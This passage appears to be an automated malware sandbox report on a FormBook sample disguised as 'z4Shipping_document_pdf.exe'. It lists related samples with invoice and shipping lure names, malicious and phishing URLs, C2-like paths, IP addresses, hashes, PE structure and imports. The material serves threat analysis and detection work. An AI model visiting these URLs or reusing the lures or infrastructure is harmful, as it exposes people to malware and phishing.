                                                                                                                    • www.lanxuanz.tech/em49/
                                                                                                                    bin.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.lanxuanz.tech/em49/
                                                                                                                    PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.jrksa.info/nq8t/
                                                                                                                    w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.novaminds.online/ephb/?xN6PGj=vLmbgoHRNfK6ITOjmiLFGNRbChMUzx7XLdCca8olfY2Nxc16AQQbup47Ltpv+Aaivc7Y&_0DPe6=UHL0NdrXCvl
                                                                                                                    RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.jrksa.info/nq8t/
                                                                                                                    RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.jrksa.info/nq8t/
                                                                                                                    H25iQbxCki.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.jrksa.info/mcz6/
                                                                                                                    206.119.82.147List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • www.wdeb18.top/vacs/
                                                                                                                    AWB_5771388044 Documenti di spedizione.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.wdeb18.top/66vh/
                                                                                                                    ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.wdeb18.top/66vh/
                                                                                                                    203.175.9.128DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                                                    • www.animekuid.xyz/17dy/

                                                                                                                    Domains

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    www.longfilsalphonse.netPO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 52.223.13.41
                                                                                                                    PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 52.223.13.41
                                                                                                                    PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 52.223.13.41
                                                                                                                    DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 52.223.13.41
                                                                                                                    file.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 52.223.13.41
                                                                                                                    www.dverkom.storeupdate SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 31.31.196.17
                                                                                                                    PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 31.31.196.17
                                                                                                                    New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 31.31.196.17
                                                                                                                    www.ngmr.xyzUMOWA_PD.BAT.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                    • 54.67.87.110
                                                                                                                    zhs.zohosites.comNVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    x.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    bin.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    PR44238-43433.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    w3xlXm0r8W.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    RFQ-9877678-9988876509886546887.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    RFQ-9877678-9988876509886546884.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    VSL_BUNKER INQUIRY.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.180.12

                                                                                                                    ASNs

                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    xneeloZAhttps://lpsholdings.co.za/bancodepopularvi-region-online.lpsholdings.co.za/Get hashmaliciousUnknownBrowse
                                                                                                                    • 156.38.210.142
                                                                                                                    SecuriteInfo.com.Linux.Siggen.9999.8163.26295.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 156.38.239.172
                                                                                                                    is homemade pepper spray legal uk 42639.jsGet hashmaliciousGookitLoaderBrowse
                                                                                                                    • 129.232.136.33
                                                                                                                    http://n275w6vy.r.us-east-1.awstrack.me/L0/http:%2F%2Fn275w6vy.r.us-east-1.awstrack.me%2FL0%2Fhttp:%252F%252Fmortgageboss.ca%252Flink.aspx%253Fcl=960%2526l=11524%2526c=17235431%2526cc=13729%2526url=%252F%252Fgoogle.com.%252F%252F%252F%252Famp%252Fs%252Fcafesmoothbfbfbjbkjbjkbfbhvfhjfbkflldsbdvdgdcshdsvdjdk.s3.amazonaws.com%252Findex.html%2F1%2F01000191be25d8dd-8215d659-ab73-4510-8075-c79794ab0f98-000000%2F7ZOmZdG4pAcYgqhcER2oX2XPqew=390/1/01000191be678b84-ebd7937b-2d68-44a5-a008-1fb7130870c6-000000/ZLSh1_21GOdIp8am4okkINu83E8=390Get hashmaliciousUnknownBrowse
                                                                                                                    • 156.38.210.142
                                                                                                                    debug.dbg.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 197.221.56.220
                                                                                                                    mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 41.203.27.56
                                                                                                                    x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 197.221.56.211
                                                                                                                    arm7.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                    • 41.203.27.57
                                                                                                                    arm4.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 41.203.15.78
                                                                                                                    sBX8VM67ZE.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 102.130.123.133
                                                                                                                    COGENT-174USShipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 38.180.87.102
                                                                                                                    SecuriteInfo.com.Linux.Siggen.9999.28931.8128.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 199.100.223.212
                                                                                                                    SecuriteInfo.com.Linux.Siggen.9999.30976.5557.elfGet hashmaliciousMiraiBrowse
                                                                                                                    • 38.237.211.64
                                                                                                                    KbgbtpUE4g.exeGet hashmaliciousGhostRat, NitolBrowse
                                                                                                                    • 206.119.171.39
                                                                                                                    https://www.iphone.trustefy.org/Get hashmaliciousUnknownBrowse
                                                                                                                    • 154.59.122.79
                                                                                                                    http://www.telegroeem.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 149.104.74.86
                                                                                                                    http://sellerthirteen.eur-tiktokshop.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 38.45.125.66
                                                                                                                    https://sellerfourth.eur-tiktokshop.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 38.45.125.66
                                                                                                                    https://sellerfifteen.eur-tiktokshop.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 38.45.125.66
                                                                                                                    http://sellerfifth.eur-tiktokshop.com/Get hashmaliciousUnknownBrowse
                                                                                                                    • 38.45.125.66
                                                                                                                    NAMECHEAP-NETUSupdate SOA.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 199.192.21.169
                                                                                                                    shipping documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 162.213.249.216
                                                                                                                    Shipping Documents_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 162.0.238.238
                                                                                                                    Quote #260924.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 162.0.238.43
                                                                                                                    http://telegram-sex-naughty18.pages.dev/Get hashmaliciousPorn ScamBrowse
                                                                                                                    • 162.213.255.57
                                                                                                                    https://purtroppopurtroppo-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                                                                                    • 63.250.43.5
                                                                                                                    https://tuttavia-fab1fa.ingress-earth.ewp.live/wp-content/plugins/aiimaea/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                                                                                    • 63.250.43.129
                                                                                                                    https://panthersaenimoine-fabc74.ingress-bonde.ewp.live/wp-content/plugins/abinbrevie/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                                                                                    • 63.250.43.2
                                                                                                                    https://urlz.fr/skxMGet hashmaliciousUnknownBrowse
                                                                                                                    • 63.250.43.1
                                                                                                                    Quote #270924.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 162.0.238.43
                                                                                                                    ZOHO-ASUSCallus+1(814)-310-9943.pdfGet hashmaliciousPayPal PhisherBrowse
                                                                                                                    • 136.143.190.180
                                                                                                                    NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    https://linklock.titanhq.com/analyse?url=https%3A%2F%2Femaze.me%2Fzinninsurance%23untitled2&data=eJxdjMEKwjAQRL-mOYa20RgPOXgpVUT8hbgJGEw2ZbNB6NebszCHN_BmwGp1Pk1HbUZtzCS8hYK1JQYXSELJItv5vj4q4fN6W7-iWiqviMNhpOY_ETcqvgHHvpIYWJCFlEtCR135_2r2zbzVQV2GeekJ2e1B5tBxj4ix2-QQelcNOXIKfv4BXds4OQ%%Get hashmaliciousUnknownBrowse
                                                                                                                    • 204.141.43.190
                                                                                                                    PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    x.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    bin.exeGet hashmaliciousFormBookBrowse
                                                                                                                    • 136.143.186.12
                                                                                                                    https://americanathletic.zohodesk.com/portal/en/kb/articles/secure-business-documentsGet hashmaliciousUnknownBrowse
                                                                                                                    • 136.143.191.172
                                                                                                                    x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                    • 165.173.254.246
                                                                                                                    https://authenticatesrv.spiritproducts.net/ck1/2d6f.7c034e718db46b30/419a3880-5f16-11ef-b8e1-525400721611/9f8bdc6e12526302fc1bc1642c86f78252fda8c1/2?e=Nm%2BKwgX31zZZHmcYOfoRL7XItJEu0aj7qdUQZVkwW4SjJAvb0T0NYaII1ijFN8OsBsszx8gv12KAbT3RDPMeVw%2FbefV4L1yqgi%2FKG9lD6NQTrh%2BQ2ox9o1TV16RIuHKxGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                    • 204.141.42.213

                                                                                                                    JA3 Fingerprints

                                                                                                                    No context

                                                                                                                    Dropped Files

                                                                                                                    No context

                                                                                                                    Created / dropped Files

                                                                                                                    C:\Users\user\AppData\Local\Temp\1FZhY82B

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\SysWOW64\rasdial.exe
                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):196608
                                                                                                                    Entropy (8bit):1.121297215059106
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
                                                                                                                    Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Users\user\AppData\Local\Temp\polygamodioecious

                                                                                                                    Download File
                                                                                                                    Process:C:\Users\user\Desktop\z4Shipping_document_pdf.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):287232
                                                                                                                    Entropy (8bit):7.994479275098664
                                                                                                                    Encrypted:true
                                                                                                                    SSDEEP:6144:JcqN8syYqTN2yhHxV9mjsbqPmv5S+eBQBirCsX/pb98X+:Jc08syYqIkHxbmjmquhSJQBHMiO
                                                                                                                    MD5:D173AD5DDE0DCE1ED77A9399ECE26FF6
                                                                                                                    SHA1:954D91F5F843D7E5662147061B574E8BA4E8F2BB
                                                                                                                    SHA-256:8D94F2181424A9B8298644FCE3E55B29F083725CF3224221E00F311FF8768CF0
                                                                                                                    SHA-512:ADDE46809AFA932923E4B4CF9B0441FE79F551BC9C76CCD5ED5BFEB5BADB1C1B1AB775C555D6A95B865D8592E99600FF0A2D5ABE77A592230386533E99A14123
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:.c...XB50...F.....SM....D?...ABH9WSNXB50G7GOPABH9WSNXB50G7G.PABF&.]N.K...6..q.*!Jw#<7%GQ*.$.>/-<.56n*7[..Yg...b%V36`UO?.G7GOPAB18^.s8%..'P.r0&.R...t8%.*.s0&.R...r8%.b.T/r0&.H9WSNXB5`.7G.Q@B....NXB50G7G.PCCC8\SN.F50G7GOPAB.*WSNHB50'3GOP.BH)WSNZB56G7GOPABN9WSNXB50'3GORABH9WSLX..0G'GO@ABH9GSNHB50G7G_PABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABfM2+:XB5..3GO@ABHiSSNHB50G7GOPABH9WSnXBU0G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB50G7GOPABH9WSNXB5

                                                                                                                    Static File Info

                                                                                                                    General

                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Entropy (8bit):7.551556359056507
                                                                                                                    TrID:
                                                                                                                    • Win32 Executable (generic) a (10002005/4) 95.11%
                                                                                                                    • AutoIt3 compiled script executable (510682/80) 4.86%
                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                    File name:z4Shipping_document_pdf.exe
                                                                                                                    File size:1'400'925 bytes
                                                                                                                    MD5:aeb5e672510e739f463553e45d7f7283
                                                                                                                    SHA1:07ec11b8ab945f5560dae2f458a63a91a3653ad3
                                                                                                                    SHA256:1a685b6a7199bf38e27672e7d65a403b8809fd83fb272e47cb26054a74d2dbe9
                                                                                                                    SHA512:0295d945c385346058ee3d60366cbe70d40c3049acb7302515e356b1630f7ca7304b7a3e8670d947b04d1b668a768aba7f507c2f1e29c804bc989b32acd0b3dc
                                                                                                                    SSDEEP:24576:ffmMv6Ckr7Mny5QLPXOyQVFGLqHY7tygENso45Eh7TDR7btD:f3v+7/5QLPFQVMq47qNz5TFdD
                                                                                                                    TLSH:D655F112B7D680B2EDA339B1293BE317EB3475194323C58B97E42E779F211409B367A1
                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

                                                                                                                    File Icon

                                                                                                                    Icon Hash:1733312925935517

                                                                                                                    Static PE Info

                                                                                                                    General

                                                                                                                    Entrypoint:0x416310
                                                                                                                    Entrypoint Section:.text
                                                                                                                    Digitally signed:false
                                                                                                                    Imagebase:0x400000
                                                                                                                    Subsystem:windows gui
                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                    DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                    Time Stamp:0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
                                                                                                                    TLS Callbacks:
                                                                                                                    CLR (.Net) Version:
                                                                                                                    OS Version Major:5
                                                                                                                    OS Version Minor:0
                                                                                                                    File Version Major:5
                                                                                                                    File Version Minor:0
                                                                                                                    Subsystem Version Major:5
                                                                                                                    Subsystem Version Minor:0
                                                                                                                    Import Hash:aaaa8913c89c8aa4a5d93f06853894da

                                                                                                                    Entrypoint Preview

                                                                                                                    Instruction
                                                                                                                    call 00007FEAC093AAFCh
                                                                                                                    jmp 00007FEAC092E8CEh
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    int3
                                                                                                                    push ebp
                                                                                                                    mov ebp, esp
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    mov esi, dword ptr [ebp+0Ch]
                                                                                                                    mov ecx, dword ptr [ebp+10h]
                                                                                                                    mov edi, dword ptr [ebp+08h]
                                                                                                                    mov eax, ecx
                                                                                                                    mov edx, ecx
                                                                                                                    add eax, esi
                                                                                                                    cmp edi, esi
                                                                                                                    jbe 00007FEAC092EA5Ah
                                                                                                                    cmp edi, eax
                                                                                                                    jc 00007FEAC092EBFAh
                                                                                                                    cmp ecx, 00000100h
                                                                                                                    jc 00007FEAC092EA71h
                                                                                                                    cmp dword ptr [004A94E0h], 00000000h
                                                                                                                    je 00007FEAC092EA68h
                                                                                                                    push edi
                                                                                                                    push esi
                                                                                                                    and edi, 0Fh
                                                                                                                    and esi, 0Fh
                                                                                                                    cmp edi, esi
                                                                                                                    pop esi
                                                                                                                    pop edi
                                                                                                                    jne 00007FEAC092EA5Ah
                                                                                                                    pop esi
                                                                                                                    pop edi
                                                                                                                    pop ebp
                                                                                                                    jmp 00007FEAC092EEBAh
                                                                                                                    test edi, 00000003h
                                                                                                                    jne 00007FEAC092EA67h
                                                                                                                    shr ecx, 02h
                                                                                                                    and edx, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FEAC092EA7Ch
                                                                                                                    rep movsd
                                                                                                                    jmp dword ptr [00416494h+edx*4]
                                                                                                                    nop
                                                                                                                    mov eax, edi
                                                                                                                    mov edx, 00000003h
                                                                                                                    sub ecx, 04h
                                                                                                                    jc 00007FEAC092EA5Eh
                                                                                                                    and eax, 03h
                                                                                                                    add ecx, eax
                                                                                                                    jmp dword ptr [004163A8h+eax*4]
                                                                                                                    jmp dword ptr [004164A4h+ecx*4]
                                                                                                                    nop
                                                                                                                    jmp dword ptr [00416428h+ecx*4]
                                                                                                                    nop
                                                                                                                    mov eax, E4004163h
                                                                                                                    arpl word ptr [ecx+00h], ax
                                                                                                                    or byte ptr [ecx+eax*2+00h], ah
                                                                                                                    and edx, ecx
                                                                                                                    mov al, byte ptr [esi]
                                                                                                                    mov byte ptr [edi], al
                                                                                                                    mov al, byte ptr [esi+01h]
                                                                                                                    mov byte ptr [edi+01h], al
                                                                                                                    mov al, byte ptr [esi+02h]
                                                                                                                    shr ecx, 02h
                                                                                                                    mov byte ptr [edi+02h], al
                                                                                                                    add esi, 03h
                                                                                                                    add edi, 03h
                                                                                                                    cmp ecx, 08h
                                                                                                                    jc 00007FEAC092EA1Eh

                                                                                                                    Rich Headers

                                                                                                                    Programming Language:
                                                                                                                    • [ASM] VS2008 SP1 build 30729
                                                                                                                    • [ C ] VS2008 SP1 build 30729
                                                                                                                    • [C++] VS2008 SP1 build 30729
                                                                                                                    • [ C ] VS2005 build 50727
                                                                                                                    • [IMP] VS2005 build 50727
                                                                                                                    • [ASM] VS2008 build 21022
                                                                                                                    • [RES] VS2008 build 21022
                                                                                                                    • [LNK] VS2008 SP1 build 30729

                                                                                                                    Data Directories

                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x8cd3c0x154.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9298.rsrc
                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x820000x840.rdata
                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                    Sections

                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                    .text0x10000x800170x802006c20c6bf686768b6f134f5bd508171bcFalse0.5602991615853659data6.634688230255595IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                    .rdata0x820000xd95c0xda00f979966509a93083729d23cdfd2a6f2dFalse0.36256450688073394data4.880040824124099IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                    .data0x900000x1a5180x6800e5d77411f751d28c6eee48a743606795False0.1600060096153846data2.2017649896261107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                    .rsrc0xab0000x92980x9400f6be76de0ef2c68f397158bf01bdef3eFalse0.4896801097972973data5.530303089784181IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                    Resources

                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                    RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                    RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                    RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                    RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                    RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                    RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                    RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
                                                                                                                    RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
                                                                                                                    RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
                                                                                                                    RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
                                                                                                                    RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
                                                                                                                    RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
                                                                                                                    RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
                                                                                                                    RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
                                                                                                                    RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
                                                                                                                    RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
                                                                                                                    RT_STRING0xb28380x43adataEnglishGreat Britain0.3733826247689464
                                                                                                                    RT_STRING0xb2c780x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                    RT_STRING0xb32780x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                    RT_STRING0xb38d80x388dataEnglishGreat Britain0.377212389380531
                                                                                                                    RT_STRING0xb3c600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
                                                                                                                    RT_GROUP_ICON0xb3db80x84dataEnglishGreat Britain0.6439393939393939
                                                                                                                    RT_GROUP_ICON0xb3e400x14dataEnglishGreat Britain1.15
                                                                                                                    RT_GROUP_ICON0xb3e580x14dataEnglishGreat Britain1.25
                                                                                                                    RT_GROUP_ICON0xb3e700x14dataEnglishGreat Britain1.25
                                                                                                                    RT_VERSION0xb3e880x19cdataEnglishGreat Britain0.5339805825242718
                                                                                                                    RT_MANIFEST0xb40280x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

                                                                                                                    Imports

                                                                                                                    DLLImport
                                                                                                                    WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
                                                                                                                    VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
                                                                                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                    COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
                                                                                                                    MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                                                                                                                    WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                                                                                                                    PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                                                                                                                    USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
